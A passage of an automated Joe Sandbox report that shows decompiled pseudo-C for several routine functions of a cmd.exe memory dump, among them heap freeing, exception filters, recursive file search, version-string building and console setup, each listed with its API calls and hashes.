                                    • Instruction ID: 87fd769d561e228706daa58c6bbd286e175035a5022efa5d7c3923d0a213f1a9
                                    • Opcode Fuzzy Hash: ebb02f2ffb30847b32b531025e7b0ba2a3c78bd1bdf5fa6874c0b213cc1816fe
                                    • Instruction Fuzzy Hash: 46417A71E002196BDF29DBA4DC99AEEB7B8FF18344F04409DE609A7141E7749E85CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011F1914(void* __ecx) {
                                    				void* _t20;
                                    				void* _t22;
                                    				void* _t23;
                                    				void** _t25;
                                    
                                    				_t23 = __ecx;
                                    				_t22 =  *(__ecx + 0x10);
                                    				_t20 = _t22 + ( *(__ecx + 0x14) & 0x0000ffff) * 0x34;
                                    				if(_t22 != _t20) {
                                    					_t25 = _t22 + 0x2c;
                                    					do {
                                    						RtlFreeHeap(GetProcessHeap(), 0,  *_t25);
                                    						 *_t25 =  *_t25 & 0x00000000;
                                    						_t25 =  &(_t25[0xd]);
                                    						 *(_t25 - 0x30) =  *(_t25 - 0x30) & 0x00000000;
                                    					} while (_t25 - 0x2c != _t20);
                                    					_t22 =  *(_t23 + 0x10);
                                    				}
                                    				RtlFreeHeap(GetProcessHeap(), 0, _t22);
                                    				 *(_t23 + 0x10) =  *(_t23 + 0x10) & 0;
                                    				 *((intOrPtr*)(_t23 + 0x14)) = 0;
                                    				return 0;
                                    			}

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,011F1735), ref: 011F1932
                                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 011F1939
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,011F1735), ref: 011F1957
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F195E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: 7fa54d8046fcaec72ed39ab8255b7baf4830f4fc760f2e6ce6597c242f6d95ab
                                    • Instruction ID: 7343d35b5ab0400354313713700172d81f559cc8d294384285f59823aef86930
                                    • Opcode Fuzzy Hash: 7fa54d8046fcaec72ed39ab8255b7baf4830f4fc760f2e6ce6597c242f6d95ab
                                    • Instruction Fuzzy Hash: 26F04F72610201ABDB24DFA0E88CBA5B7F8FF58326F10092DF641C6440EB74E5D5CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011E6FE3(struct _EXCEPTION_POINTERS* _a4) {
                                    
                                    				SetUnhandledExceptionFilter(0);
                                    				UnhandledExceptionFilter(_a4);
                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                    			}



                                    0x011e6fea
                                    0x011e6ff3
                                    0x011e700c

                                    APIs
                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E7119,011D1000), ref: 011E6FEA
                                    • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(011E7119,?,011E7119,011D1000), ref: 011E6FF3
                                    • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,011E7119,011D1000), ref: 011E6FFE
                                    • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,011E7119,011D1000), ref: 011E7005
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                    • String ID:
                                    • API String ID: 3231755760-0
                                    • Opcode ID: 14b00860cd93b38cd020d9d54970c92856937f214fa9e9bccdeaaf5e0bc664c8
                                    • Instruction ID: 31835f397d3bad6aebd802a71f7ccd3bac52b24c836e675622d32b9b528a64e3
                                    • Opcode Fuzzy Hash: 14b00860cd93b38cd020d9d54970c92856937f214fa9e9bccdeaaf5e0bc664c8
                                    • Instruction Fuzzy Hash: 48D0C932580104ABCF20ABE1F81CA893E28EB9431AF044420F309C2014CE714491CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E011F31DC(void* __ecx, long __edx, long _a4, intOrPtr _a8, signed short* _a12) {
                                    				signed int _v8;
                                    				char _v564;
                                    				struct _WIN32_FIND_DATAW _v612;
                                    				signed short* _v616;
                                    				signed int _v620;
                                    				signed int _v624;
                                    				void* _v628;
                                    				signed int _v632;
                                    				short* _v636;
                                    				intOrPtr* _v640;
                                    				intOrPtr _v644;
                                    				short* _v652;
                                    				intOrPtr _v656;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t65;
                                    				intOrPtr _t68;
                                    				intOrPtr _t69;
                                    				signed int _t71;
                                    				intOrPtr _t83;
                                    				WCHAR* _t87;
                                    				signed int _t96;
                                    				signed int _t97;
                                    				signed int _t98;
                                    				signed int _t99;
                                    				short _t100;
                                    				intOrPtr _t101;
                                    				WCHAR* _t107;
                                    				signed short* _t119;
                                    				void* _t120;
                                    				short* _t121;
                                    				signed int _t123;
                                    				intOrPtr _t124;
                                    				signed int _t125;
                                    				void* _t129;
                                    				signed short* _t130;
                                    				short* _t134;
                                    				intOrPtr* _t137;
                                    				WCHAR* _t142;
                                    				char* _t146;
                                    				char* _t147;
                                    				short* _t148;
                                    				intOrPtr* _t149;
                                    				WCHAR* _t157;
                                    				intOrPtr* _t162;
                                    				WCHAR* _t168;
                                    				signed int _t170;
                                    				void* _t177;
                                    				signed short* _t178;
                                    				short* _t179;
                                    				signed int _t180;
                                    				void* _t181;
                                    				signed int _t183;
                                    				signed int _t185;
                                    				void* _t186;
                                    				WCHAR* _t189;
                                    				intOrPtr* _t191;
                                    				signed int _t192;
                                    
                                    				_t194 = (_t192 & 0xfffffff8) - 0x274;
                                    				_t65 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t65 ^ (_t192 & 0xfffffff8) - 0x00000274;
                                    				_v612.ftCreationTime.dwFileAttributes = __edx;
                                    				_t162 = __ecx;
                                    				_t119 = _a12;
                                    				_v612.dwFileAttributes = _a4;
                                    				_v628 = __ecx;
                                    				_t7 = _t162 + 2; // 0x2
                                    				_t129 = _t7;
                                    				_v616 = _t119;
                                    				_t185 = 0;
                                    				do {
                                    					_t68 =  *_t162;
                                    					_t162 = _t162 + 2;
                                    				} while (_t68 != 0);
                                    				_t130 = _t119;
                                    				_t164 = _t162 - _t129 >> 1;
                                    				if( *_t119 == 0) {
                                    					L53:
                                    					_t69 = 0;
                                    				} else {
                                    					do {
                                    						_t178 = _t130;
                                    						do {
                                    							_t71 =  *_t130 & 0x0000ffff;
                                    							_t130 =  &(_t130[1]);
                                    						} while (_t71 != 0);
                                    						_t185 = _t185 + (_t130 - _t178 >> 1) + _t164;
                                    					} while ( *_t130 != 0);
                                    					if(0 == _t185) {
                                    						goto L53;
                                    					} else {
                                    						_t9 = _t185 + 1; // 0x1
                                    						_t187 = _t9 & 0x0000ffff;
                                    						_v624 = _t9 & 0x0000ffff;
                                    						_t179 = E011E00B0(_t187 + _t187);
                                    						if(_t179 != 0) {
                                    							_t134 = 0;
                                    							_v632 = _t119;
                                    							_t121 = _t179;
                                    							if( *_v616 != 0) {
                                    								do {
                                    									E011E1040(_t121, _t187 - (_t121 - _t179 >> 1), _v628);
                                    									E011E18C0(_t121, _t187 - (_t121 - _t179 >> 1), _v636);
                                    									_t191 = E011DD7E6(_v640);
                                    									_t134 = _t121;
                                    									_v640 = _t191;
                                    									_t121 = E011DD7E6(_t134);
                                    									_t187 = _v632;
                                    								} while ( *_t191 != 0);
                                    							}
                                    							_push(_t134);
                                    							 *_t121 = 0;
                                    							_v644 = E011D7EEC(_t121, _v612.ftCreationTime.dwFileAttributes, _v612.dwFileAttributes, _a8, _t179);
                                    							E011E0040(_t179);
                                    							_t122 = _v640;
                                    							_t137 = _v640;
                                    							_t24 = _t137 + 2; // 0x2
                                    							_t164 = _t24;
                                    							do {
                                    								_t83 =  *_t137;
                                    								_t137 = _t137 + 2;
                                    							} while (_t83 != 0);
                                    							_t25 = (_t137 - _t164 >> 1) + 2; // 0x0
                                    							_t180 = _t25;
                                    							_v624 = _t180;
                                    							_t189 = E011E00B0(_t180 + _t180);
                                    							if(_t189 == 0) {
                                    								goto L8;
                                    							} else {
                                    								E011E1040(_t189, _t180, _t122);
                                    								_t87 = _t189;
                                    								_t142 = _t189;
                                    								if( *_t189 != 0) {
                                    									do {
                                    										_t142 = _t87;
                                    										_t87 =  &(_t87[1]);
                                    									} while ( *_t87 != 0);
                                    								}
                                    								_t28 =  &(_t142[1]); // 0x2
                                    								_t164 = _t180;
                                    								_v632 = _t28;
                                    								E011E18C0(_t189, _t180, "*");
                                    								_t123 = FindFirstFileW(_t189,  &_v612);
                                    								_v632 = _t123;
                                    								 *_v636 = 0;
                                    								if(_t123 == 0xffffffff) {
                                    									_t124 = _v636;
                                    								} else {
                                    									do {
                                    										if((_v612.ftCreationTime.dwFileAttributes & 0x00000010) == 0) {
                                    											L46:
                                    											_t124 = _v636;
                                    											goto L47;
                                    										} else {
                                    											_t146 = ".";
                                    											_t96 =  &_v564;
                                    											while(1) {
                                    												_t164 =  *_t96;
                                    												if(_t164 !=  *_t146) {
                                    													break;
                                    												}
                                    												if(_t164 == 0) {
                                    													L23:
                                    													_t125 = 0;
                                    													_t97 = 0;
                                    												} else {
                                    													_t164 =  *((intOrPtr*)(_t96 + 2));
                                    													_t38 =  &(_t146[2]); // 0x200000
                                    													if(_t164 !=  *_t38) {
                                    														break;
                                    													} else {
                                    														_t96 = _t96 + 4;
                                    														_t146 =  &(_t146[4]);
                                    														if(_t164 != 0) {
                                    															continue;
                                    														} else {
                                    															goto L23;
                                    														}
                                    													}
                                    												}
                                    												L25:
                                    												if(_t97 == 0) {
                                    													goto L46;
                                    												} else {
                                    													_t147 = L"..";
                                    													_t98 =  &_v564;
                                    													while(1) {
                                    														_t164 =  *_t98;
                                    														if(_t164 !=  *_t147) {
                                    															break;
                                    														}
                                    														if(_t164 == 0) {
                                    															L31:
                                    															_t99 = _t125;
                                    														} else {
                                    															_t164 =  *((intOrPtr*)(_t98 + 2));
                                    															_t41 =  &(_t147[2]); // 0x2e
                                    															if(_t164 !=  *_t41) {
                                    																break;
                                    															} else {
                                    																_t98 = _t98 + 4;
                                    																_t147 =  &(_t147[4]);
                                    																if(_t164 != 0) {
                                    																	continue;
                                    																} else {
                                    																	goto L31;
                                    																}
                                    															}
                                    														}
                                    														L33:
                                    														if(_t99 == 0) {
                                    															goto L46;
                                    														} else {
                                    															_t168 = _t189;
                                    															_t42 =  &(_t168[1]); // 0x2
                                    															_t148 = _t42;
                                    															do {
                                    																_t100 =  *_t168;
                                    																_t168 =  &(_t168[1]);
                                    															} while (_t100 != _t125);
                                    															_t149 =  &_v564;
                                    															_t170 = _t168 - _t148 >> 1;
                                    															_t181 = _t149 + 2;
                                    															do {
                                    																_t101 =  *_t149;
                                    																_t149 = _t149 + 2;
                                    															} while (_t101 != _t125);
                                    															_t45 = _t170 + 2; // 0x0
                                    															_t183 = _t45 + (_t149 - _t181 >> 1);
                                    															if(_t183 <= _v624) {
                                    																_t183 = _v624;
                                    																goto L45;
                                    															} else {
                                    																_t164 = _t183 + _t183;
                                    																_t107 = E011E0100(_t189, _t183 + _t183);
                                    																if(_t107 == 0) {
                                    																	_t124 = 1;
                                    																} else {
                                    																	_t189 = _t107;
                                    																	_v624 = _t183;
                                    																	_t157 = _t107;
                                    																	while( *_t107 != _t125) {
                                    																		_t157 = _t107;
                                    																		_t107 =  &(_t107[1]);
                                    																	}
                                    																	_t49 =  &(_t157[1]); // 0x2
                                    																	_v632 = _t49;
                                    																	L45:
                                    																	E011E18C0(_t189, _t183,  &_v564);
                                    																	E011E18C0(_t189, _t183, "\\");
                                    																	_t164 = _v620;
                                    																	_t124 = E011F31DC(_t189, _v620, _v624, _a8, _v628);
                                    																	_v656 = _t124;
                                    																	 *_v652 = 0;
                                    																	goto L47;
                                    																}
                                    															}
                                    														}
                                    														goto L50;
                                    													}
                                    													asm("sbb eax, eax");
                                    													_t99 = _t98 | 0x00000001;
                                    													goto L33;
                                    												}
                                    												goto L50;
                                    											}
                                    											asm("sbb eax, eax");
                                    											_t97 = _t96 | 0x00000001;
                                    											_t125 = 0;
                                    											goto L25;
                                    										}
                                    										L50:
                                    										FindClose(_v628);
                                    										goto L52;
                                    										L47:
                                    									} while (FindNextFileW(_v628,  &(_v612.ftCreationTime)) != 0);
                                    									goto L50;
                                    								}
                                    								L52:
                                    								E011E0040(_t189);
                                    								_t69 = _t124;
                                    							}
                                    						} else {
                                    							L8:
                                    							_t69 = 1;
                                    						}
                                    					}
                                    				}
                                    				_pop(_t177);
                                    				_pop(_t186);
                                    				_pop(_t120);
                                    				return E011E6FD0(_t69, _t120, _v8 ^ _t194, _t164, _t177, _t186);
                                    			}































































                                    0x011f34c5
                                    0x00000000
                                    0x011f34cd
                                    0x011f34e2
                                    0x011f34e4
                                    0x011f34e9
                                    0x011f34e9
                                    0x011f3275
                                    0x011f3275
                                    0x011f3277
                                    0x011f3277
                                    0x011f3273
                                    0x011f3257
                                    0x011f34f6
                                    0x011f34f7
                                    0x011f34f8
                                    0x011f3503

                                    APIs
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D250C,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 011F3362
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000010), ref: 011F34BF
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F34D6
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 3541575487-0
                                    • Opcode ID: e32a7d8a12cdf5c9c43104cd3e186a55b9f45ed73193197bdd66b53308640b4c
                                    • Instruction ID: ea202249c0176331835fe5eea9022bca7728bbc3396f3b1e5b8ed8b726ba87c9
                                    • Opcode Fuzzy Hash: e32a7d8a12cdf5c9c43104cd3e186a55b9f45ed73193197bdd66b53308640b4c
                                    • Instruction Fuzzy Hash: EF9105357182028BCB2DEF68C85056FB7E2FFD8244B45892DEA66C7344EB31D946C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 37%
                                    			E011D443C(void* __ecx) {
                                    				signed char _t5;
                                    				void* _t12;
                                    
                                    				_t12 = __ecx;
                                    				_t5 = GetVersion();
                                    				_push(E011D4476());
                                    				_push(_t5 >> 0x10);
                                    				_push(_t5 >> 0x00000008 & 0x000000ff);
                                    				return E011E274C(_t12, 0x20, L"%d.%d.%05d.%d", _t5 & 0x000000ff);
                                    			}






                                    APIs
                                    • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,011F731D,?,?,?,?,?), ref: 011D4442
                                      • Part of subcall function 011D4476: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,011F731D,?,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D449A
                                      • Part of subcall function 011D4476: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(011F731D,UBR,00000000,?,?,011D444F,?,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D44BE
                                      • Part of subcall function 011D4476: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(011F731D,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D44C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValueVersion
                                    • String ID: %d.%d.%05d.%d
                                    • API String ID: 2996790148-3457777122
                                    • Opcode ID: ef600167d06cfe25ab7ff4e52a1cbed5010b836bb5e328bfb8af34fe956f34b7
                                    • Instruction ID: d8b87bb812f0a474e0cfd25c28be566a08f53c50b86f9a5a476e0c8d96e635ac
                                    • Opcode Fuzzy Hash: ef600167d06cfe25ab7ff4e52a1cbed5010b836bb5e328bfb8af34fe956f34b7
                                    • Instruction Fuzzy Hash: 26D02BB1B5013037D62C65AA1C5DE7B508DC6E8022744402EF80193285DBB85C1442B4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,00000006,?,011F2418), ref: 011F228B
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: DebuggerPresent
                                    • String ID:
                                    • API String ID: 1347740429-0
                                    • Opcode ID: 78b97945a7e13964da642b551f13cd405f418daaf34820872e9f42c37f347781
                                    • Instruction ID: 62bec8d4ed78aa68b2ca6a63eafb7252236bc747a1e3d5367e4f69c6b4e06c6b
                                    • Opcode Fuzzy Hash: 78b97945a7e13964da642b551f13cd405f418daaf34820872e9f42c37f347781
                                    • Instruction Fuzzy Hash: 0AF02034A0412EAB8F38DFB9B50977A3BE8AB65704B41015DE907C7145CF30E9009B92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011E7310() {
                                    
                                    				SetUnhandledExceptionFilter(E011E72C0);
                                    				return 0;
                                    			}




                                    APIs
                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000172C0), ref: 011E7315
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: b7cb22bbca189cae88a2d674bcad2cdad209ff327a4103c2058d88598af721dc
                                    • Instruction ID: 3ac6eef4a0fd1bf9d7958076283795cde8cc2069a6392bc08c55886776918096
                                    • Opcode Fuzzy Hash: b7cb22bbca189cae88a2d674bcad2cdad209ff327a4103c2058d88598af721dc
                                    • Instruction Fuzzy Hash: 61900260B5191186DF2867F27C1D50575E05AA96067414464F001C9048DF6041485661
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E011E3D27(void* __ebx, intOrPtr* __ecx) {
                                    				signed int _v8;
                                    				char _v72;
                                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v96;
                                    				void* _v100;
                                    				intOrPtr* _v104;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t26;
                                    				void* _t29;
                                    				void* _t30;
                                    				WCHAR* _t36;
                                    				intOrPtr _t57;
                                    				WCHAR* _t59;
                                    				int _t60;
                                    				WCHAR* _t72;
                                    				struct HINSTANCE__* _t76;
                                    				intOrPtr* _t80;
                                    				int _t88;
                                    				WCHAR* _t89;
                                    				WCHAR* _t91;
                                    				void* _t95;
                                    				void* _t98;
                                    				short _t100;
                                    				intOrPtr* _t109;
                                    				WCHAR* _t113;
                                    				short _t122;
                                    				short* _t125;
                                    				void* _t129;
                                    				long _t131;
                                    				intOrPtr* _t133;
                                    				intOrPtr* _t134;
                                    				void* _t135;
                                    				void* _t136;
                                    				void* _t137;
                                    				signed int _t138;
                                    				void* _t139;
                                    
                                    				_t95 = __ebx;
                                    				_t26 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t26 ^ _t138;
                                    				_t133 = __ecx;
                                    				_v104 = __ecx;
                                    				 *0x1203858 = 0x120385c;
                                    				InitializeCriticalSection(0x120385c);
                                    				EnterCriticalSection( *0x1203858);
                                    				_t131 = 0;
                                    				 *0x11fd544 = 0;
                                    				LeaveCriticalSection( *0x1203858);
                                    				_t29 = SetConsoleCtrlHandler(E011F6D90, 1);
                                    				__imp___get_osfhandle(0x120387c);
                                    				_t30 = GetConsoleMode(_t29, 1);
                                    				__imp___get_osfhandle(0, 0x1203878);
                                    				_pop(_t98);
                                    				GetConsoleMode(_t30, ??);
                                    				E011E06C0(_t98);
                                    				 *0x1203834 = E011E3AAE();
                                    				 *0x1203830 = E011E3B2C(_t98);
                                    				L011E41DD(_t133);
                                    				_t36 = GetCommandLineW();
                                    				_t3 =  &(_t36[1]); // 0x2
                                    				_t125 = _t3;
                                    				do {
                                    					_t100 =  *_t36;
                                    					_t36 =  &(_t36[1]);
                                    				} while (_t100 != 0);
                                    				_t144 = (_t36 - _t125 >> 1) + 1 - 0x2000;
                                    				if((_t36 - _t125 >> 1) + 1 > 0x2000) {
                                    					_push(0);
                                    					E011DC5A2(0x2000);
                                    					_t103 = 0x400023df;
                                    					do {
                                    						__eflags = E011E4B60(__eflags, 0);
                                    					} while (__eflags == 0);
                                    					L21:
                                    					exit(1);
                                    					L22:
                                    					_push(_t131);
                                    					E011DC5A2(_t103);
                                    					_t103 = 0x2374;
                                    					do {
                                    						__eflags = E011E4B60(__eflags, _t131);
                                    					} while (__eflags == 0);
                                    					goto L21;
                                    				}
                                    				_t103 =  &_v100;
                                    				E011E2A7C( &_v100, 0x2000, _t144);
                                    				_t134 = _v100;
                                    				if(_t134 == 0) {
                                    					goto L22;
                                    				}
                                    				E011E1040(_t134, 0x2000, GetCommandLineW());
                                    				if(E011E0C70(0x1213ab0, ((0 |  *0x1213cbc == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					_push(0);
                                    					E011DC5A2(0x1213ab0);
                                    					_t103 = 0x2374;
                                    					do {
                                    						__eflags = E011E4B60(__eflags, 0);
                                    					} while (__eflags == 0);
                                    					goto L21;
                                    				}
                                    				_t108 =  *0x1213cb8;
                                    				if( *0x1213cb8 == 0) {
                                    					_t108 = 0x1213ab0;
                                    				}
                                    				E011E36CB(_t95, _t108,  *0x1213cc0, _t131);
                                    				E011DCEA9();
                                    				_t109 = _t134;
                                    				_t129 = _t109 + 2;
                                    				do {
                                    					_t57 =  *_t109;
                                    					_t109 = _t109 + 2;
                                    					_t149 = _t57 - _t131;
                                    				} while (_t57 != _t131);
                                    				E011DD3F4(_v104, _t149, _t134, _t109 - _t129 >> 1);
                                    				_t59 =  *0x1213cb8;
                                    				_t130 = 0x1213ab0;
                                    				_t113 = _t59;
                                    				if(_t59 == 0) {
                                    					_t113 = 0x1213ab0;
                                    				}
                                    				_t135 = 0x5c;
                                    				_t136 = _v100;
                                    				if( *_t113 == _t135) {
                                    					_t103 = _t59;
                                    					__eflags = _t59;
                                    					if(_t59 == 0) {
                                    						_t103 = _t130;
                                    					}
                                    					_t137 = 0x5c;
                                    					__eflags = _t103[1] - _t137;
                                    					_t136 = _v100;
                                    					if(_t103[1] != _t137) {
                                    						goto L10;
                                    					} else {
                                    						__eflags =  *0x1218528;
                                    						if( *0x1218528 != 0) {
                                    							goto L10;
                                    						}
                                    						__eflags = _t59;
                                    						if(_t59 == 0) {
                                    							_t59 = _t130;
                                    						}
                                    						E011DC5A2(_t103, 0x400023c8, 1, _t59);
                                    						_t91 =  *0x1213cb8;
                                    						_t139 = _t139 + 0xc;
                                    						__eflags = _t91;
                                    						if(_t91 == 0) {
                                    							_t91 = 0x1213ab0;
                                    						}
                                    						__eflags = GetWindowsDirectoryW(_t91,  *0x1213cc0);
                                    						if(__eflags == 0) {
                                    							do {
                                    								__eflags = E011E4B60(__eflags, _t131);
                                    							} while (__eflags == 0);
                                    							goto L21;
                                    						} else {
                                    							_t124 =  *0x1213cb8;
                                    							__eflags =  *0x1213cb8;
                                    							if(__eflags == 0) {
                                    								_t124 = 0x1213ab0;
                                    							}
                                    							_t130 = 0;
                                    							E011E33FC(_t95, _t124, 0, _t131, _t136, __eflags);
                                    							goto L10;
                                    						}
                                    					}
                                    				} else {
                                    					L10:
                                    					_t60 = GetConsoleOutputCP();
                                    					 *0x1203854 = _t60;
                                    					GetCPInfo(_t60, 0x1203840);
                                    					E011E3F80();
                                    					_t64 = HeapAlloc(GetProcessHeap(), _t131, 0x20c);
                                    					 *0x1203874 = _t64;
                                    					if(_t64 != 0 && _t64 == 0) {
                                    						_t64 =  *0x1203874;
                                    						 *( *0x1203874) = 0;
                                    					}
                                    					if( *0x1213ccc == _t131) {
                                    						__eflags = E011E269C(_t64);
                                    						if(__eflags == 0) {
                                    							goto L13;
                                    						}
                                    						__eflags =  *0x11fd5a0 - _t131; // 0x0
                                    						if(__eflags != 0) {
                                    							L51:
                                    							_t122 =  *0x11fd5a0; // 0x0
                                    							E011F7DF1(_t122, _t136);
                                    							goto L13;
                                    						}
                                    						_t88 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v96);
                                    						__eflags = _t88;
                                    						if(_t88 == 0) {
                                    							_t89 =  *0x11fd5a0; // 0x0
                                    						} else {
                                    							_t89 = _v96.wAttributes;
                                    							 *0x11fd5a0 = _t89;
                                    						}
                                    						__eflags = _t89;
                                    						if(__eflags == 0) {
                                    							goto L13;
                                    						} else {
                                    							goto L51;
                                    						}
                                    					} else {
                                    						L13:
                                    						if( *((intOrPtr*)(_v104 + 8)) == _t131) {
                                    							_v100 = E011F6456(__eflags);
                                    							E011D443C( &_v72);
                                    							E011DC108( &_v72, 0x2350, 1,  &_v72);
                                    							E011E25D9(L"\r\n");
                                    							_t72 = _v100;
                                    							__eflags = _t72;
                                    							if(_t72 == 0) {
                                    								_push(_t131);
                                    								_push(8);
                                    								E011DC5A2( &_v72);
                                    							} else {
                                    								_push(_t72);
                                    								E011E25D9(L"%s");
                                    								E011E25D9(L"\r\n");
                                    							}
                                    							GlobalFree(_v100);
                                    						}
                                    						_t76 = GetModuleHandleW(L"KERNEL32.DLL");
                                    						 *0x11fd0d0 = _t76;
                                    						 *0x120388c = GetProcAddress(_t76, "CopyFileExW");
                                    						GetProcAddress( *0x11fd0d0, "IsDebuggerPresent");
                                    						 *0x1203888 = GetProcAddress( *0x11fd0d0, "SetConsoleInputExeNameW");
                                    						_t80 = _v104;
                                    						if( *_t80 != _t131 ||  *((intOrPtr*)(_t80 + 4)) != _t131 ||  *((intOrPtr*)(_t80 + 8)) != _t131) {
                                    							_t131 = 1;
                                    						}
                                    						__imp__??_V@YAXPAX@Z();
                                    						return E011E6FD0(_t131, _t95, _v8 ^ _t138, _t130, _t131, _t136, _t136);
                                    					}
                                    				}
                                    			}








































                                    0x00000000
                                    0x00000000
                                    0x011e3ef6
                                    0x011e3ef6
                                    0x011e3efc
                                    0x011ee19b
                                    0x011ee19e
                                    0x011ee1ae
                                    0x011ee1b8
                                    0x011ee1bd
                                    0x011ee1c3
                                    0x011ee1c5
                                    0x011ee1e1
                                    0x011ee1e2
                                    0x011ee1e4
                                    0x011ee1c7
                                    0x011ee1c7
                                    0x011ee1cd
                                    0x011ee1d7
                                    0x011ee1dc
                                    0x011ee1ef
                                    0x011ee1ef
                                    0x011e3f07
                                    0x011e3f13
                                    0x011e3f29
                                    0x011e3f2e
                                    0x011e3f45
                                    0x011e3f4a
                                    0x011e3f4f
                                    0x011e3f5d
                                    0x011e3f5d
                                    0x011e3f5f
                                    0x011e3f77
                                    0x011e3f77
                                    0x011e3ef0

                                    APIs
                                    • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0120385C), ref: 011E3D4B
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D57
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D6B
                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(011F6D90,00000001), ref: 011E3D78
                                    • _get_osfhandle.MSVCRT ref: 011E3D85
